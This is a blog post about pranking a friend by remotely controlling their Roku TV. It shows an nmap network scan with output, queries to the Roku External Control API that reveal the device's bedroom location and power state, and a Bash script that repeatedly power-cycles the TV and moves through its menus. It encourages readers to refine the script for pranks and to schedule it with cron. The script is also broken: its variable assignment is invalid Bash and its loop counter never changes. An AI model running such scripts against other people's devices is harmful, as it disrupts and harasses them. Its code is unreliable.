There are few things in life that I enjoy more than a good prank, and as I casually sifted through the network traffic of a friend who challenged me to “hack them,” I came across something interesting. A UPnP packet bounced across the screen of my Wireshark capture, and as I combed through the data, I realized that I had struck gold. With a little more enumeration, a sprinkle of XML, and some Googling, I had uncovered how I would “hack” my friend (or potential future enemy).
It Began With Enumeration:
nmap -sV -O -n -T4 192.168.X.X/24
As I loudly scanned the network, I was met with version numbers, OS guesses, and even a manufacturer!
Nmap scan report for 192.168.X.X
Host is up (0.010s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
7000/tcp open rtsp AirTunes rtspd
9080/tcp open http Mongoose httpd
MAC Address: 10:59:32:XX:XX:XX (Roku)
The “Roku” immediately fascinated me, so I began to dig into the services running on the system. I started a Wireshark capture to observe how the device interacted across the network; immediately, a UPnP packet shot across the screen with a LOCATION field consisting of the URL: “http://192.168.X.X:8060/dial/dd.xml.” After navigating to the page and finding another similar “ECP” XML page, I did some research.
https://developer.roku.com/docs/developer-program/debugging/external-control-api.md
I encountered this article on how to interact with Roku devices by sending external control service commands! Bingo! So I asked myself the question, “What can I do with this?”
It Continued With More Enumeration:
After reading the developer’s article, I was curious of what other information could be pulled from the device, and I found that this service command provided the most comprehensive information:
http://192.168.X.X:8060/query/device-info
Here are just some examples of what I collected from the device:
<user-device-location>Bedroom</user-device-location>
<power-mode>PowerOn</power-mode>
<supports-find-remote>true</supports-find-remote>
It was in my friend’s bedroom, powered on, and supported remote commands so I had even more scope to mess with them, so logically, I scoured the article for input service commands that would allow for me to manipulate the device. Then I thought, “Wait, why manually mess with them when I can automate the process for more fun?” I decided to write a simple Bash script that would repeatedly turn the device on and off, and upon exiting the first loop, turn the device on, traverse to the Home Screen, and repeatedly go left and down on the menu. Because the device was remote supported, I could have turned the volume up or down on them, but I’ll save that for next time. Here is a rough script that I deployed to mess with them:
#!/bin/bash
# How to mess with someone who has a Roku TV 101
Hahaha = 1
while [ $Hahaha -le 100 ]
do
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/powerOff"
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/powerOff"
done
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/Home"
while [ $Hahaha -le 100 ]
do
curl -d '' "http://192.168.X.X:8060/keypress/left"
curl -d '' "http://192.168.X.X:8060/keypress/down"
done
echo "Can we still be friends?"
There are endless opportunities for fun with this, as you could write cron jobs, scheduled tasks, and batch files to execute these commands with perfect timing. Not only can this be used for mischievous fun, but if you conveniently want to turn on your TV as you walk through the door at 6:02, this could help with that.
All in all, I considered it a successful day. Enumerated the network, learned something new, and had fun while doing it. If you have recommendations for harnessing this script for maximum potential and pranking, feel free to reach out to me at my Github (https://github.com/RoseSecurity)!
: wq!
Top comments (0)